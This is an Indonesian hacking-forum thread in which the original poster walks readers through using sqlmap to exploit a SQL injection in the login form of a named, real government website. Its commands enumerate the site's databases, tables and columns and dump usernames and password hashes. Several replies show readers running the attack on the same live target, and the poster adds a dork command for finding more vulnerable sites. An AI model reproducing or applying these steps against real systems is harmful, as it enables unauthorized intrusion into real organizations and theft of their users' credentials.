![]() |
Exploitation ( Sqlmap $POST ) - Printable Version +- BackBox Indonesia (https://www.backboxindonesia.or.id) +-- Forum: Attacking (https://www.backboxindonesia.or.id/forum-12.html) +--- Forum: Web Attack (https://www.backboxindonesia.or.id/forum-15.html) +--- Thread: Exploitation ( Sqlmap $POST ) (/thread-46.html) Pages:
1
2
|
Exploitation ( Sqlmap $POST ) - kcnewbie - 03-12-2016 ![]() Assalamualaikum Haloo.. ketemu lagi nih.. ckck... ane akan menunjukan ilmu ane yang sedikit ini.. hehe.. yaitu .. SQLMAP .. apa itu SQLMAP ? Sqlmap adalah tools opensource yang mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. dengan melakukan serangan SQL injection. kali ini ane akan ngebahas tentang.. cara exploitasi website ber bug Sql Injection $POST .. :D ok langsung kita mulai aja.. target : http://datanusantara.lemhannas.go.id/home/login $POST : login_param=1&username=dsdsads&password=dasdsa&security_code=0499 bug : password 1. Scanning Database ketikan perintah: Code: sqlmap -u http://datanusantara.lemhannas.go.id/home/login --"data=login_param=1&username=dsdsads&password=dasdsa&security_code=0499" -p "password" --dbs ![]() nah keluarkan list database nya .. rincian: perintah sqlmap : perintah untuk memanggil/menjalankan sqlmap perintah -u : untuk menentukan target/site perintah --data= : untuk menentukan $POST pada target perintah -p : untuk menentukan parameter post manakah yang vuln perintah --dbs : untuk mencollect Database / scanning database 2. Scanning Tables on Database Ketika kita sudah mendapatkan list DBnya.. lalu kita scanning tables yang ada didalamnya.. ketikan perintah: Code: sqlmap -u http://datanusantara.lemhannas.go.id/home/login --"data=login_param=1&username=dsdsads&password=dasdsa&security_code=0499" -p "password" -D risphate_sisdatadb --tables ![]() rincian : --tables : untuk menscanning table yang ada di dalam database yang kita pilih.. formatnya: namadatabase -D namatablenya --tables -D sendiri adalah sama untuk mendeteksi database yang kita pilih untuk mendapatkan tablenya.. 3. Scanning Columns on Tables setelah kita mendapatkan database dan tables nya.. sekarang kita coba collect lebih dalam lagi.. yaitu kita scann columnya.. ketikan perintah: Code: sqlmap -u http://datanusantara.lemhannas.go.id/home/login --"data=login_param=1&username=dsdsads&password=dasdsa&security_code=0499" -p "password" -D risphate_sisdatadb -T tbl_pengguna --columns ![]() rincian: --columns adalah perintah untuk mencollect column yg berada di dalam tables.. untuk menentukan tables yang ingin kita dump columnya ketikan perintah.. -D nama database -T namatablesnya --column 4. DUMP data akhirnya kita telah mencapai ke penghujung acara hehe... saatnya kita sedot datanya , siapa tau ada data penting ye gak ? :v ok ketikan perintah: Code: sqlmap -u http://datanusantara.lemhannas.go.id/home/login --"data=login_param=1&username=dsdsads&password=dasdsa&security_code=0499" -p "password" -D risphate_sisdatadb -T tbl_pengguna -C username,password --dump ![]() Jika ada pertanyaan seperti di atas.. itu ada lah pertanyaan " apakah kamu mau crack password di atas via dictionary based ?" intinya ente mau di crack otomatis gak ? pake wordlist yg di sediakan sqlmap ? jika iya ketik Y / enter saja jika tidak ketik N.. ![]() Taraa.. data pun ter dump.. kalian bisa juga mengcrack nya di HashKiller.co.uk Selamat berpentest ^_^ RE: Exploitation ( Sqlmap $POST ) - Aiden_ - 03-12-2016 wow nice bang :D nambahh dah ilmu nyaa :D RE: Exploitation ( Sqlmap $POST ) - anongep - 03-12-2016 @TS : semisal saya ngga tau target om ?, dork'nya apa atuh ? ^_^/ RE: Exploitation ( Sqlmap $POST ) - kcnewbie - 03-12-2016 (03-12-2016, 03:55 AM)anongep Wrote: @TS : semisal saya ngga tau target om ?, dork'nya apa atuh ? ^_^/ ketikan perintah: sqlmap -g inurl:.php?id= kalau mau lebih lengkap lagi.. silahkan sqlmap --h RE: Exploitation ( Sqlmap $POST ) - Nue Bhandell - 03-12-2016 Jejak, nenda dlo.. nanti malam nyicip ah~ akkwawkwa tengkyu om TS RE: Exploitation ( Sqlmap $POST ) - teh - 03-12-2016 --"data=login_param=1&username=dsdsads&password=dasdsa&security_code=0499" om mau tanya ini isi dari parameter username password security_code bebas yaa om asal di isi. . RE: Exploitation ( Sqlmap $POST ) - kcnewbie - 03-12-2016 (03-12-2016, 12:35 PM)teh Wrote: --"data=login_param=1&username=dsdsads&password=dasdsa&security_code=0499" bukan bro security_code itu hanya parameter di path login.. yaitu code keamanan kalau mau login kan ada tuh... ckck.. data post ini kalau kita mau lihat coba aja pakai hack bar... centang kolom post.. lalu coba isi asal form login di website.. lalu klik load url di hack bar.. nanti di kotak bawah tempat post itu ada keluar parameter mirip seperti iitu.. nah itu yang di masukan ke --"data=post data" gitu om.. tapi kalau om mau pake target yang saya sediakan di atas yang lemhannas, iya isi asal aja... RE: Exploitation ( Sqlmap $POST ) - Nue Bhandell - 03-13-2016 bang pas nyampe step 2 kok muncul No such file or directory... target ane samain ama yg di thread ente RE: Exploitation ( Sqlmap $POST ) - kcnewbie - 03-13-2016 (03-13-2016, 11:22 AM)Nue Bhandell Wrote: bang pas nyampe step 2 kok muncul No such file or directory... maaf tadi ane kurang perintahnya.. hehe.. harusnya pakai sqlmap -u... target gk harus sama kok.. hehe.. ane kasih target biar pada gk pusing carinya jadi tinggal latihan aja.. ckck RE: Exploitation ( Sqlmap $POST ) - Nue Bhandell - 03-13-2016 (03-13-2016, 12:56 PM)kcnewbie Wrote:(03-13-2016, 11:22 AM)Nue Bhandell Wrote: bang pas nyampe step 2 kok muncul No such file or directory... iya bang , ehehe saya pakek target abang cuma buat belajar doang.. :D |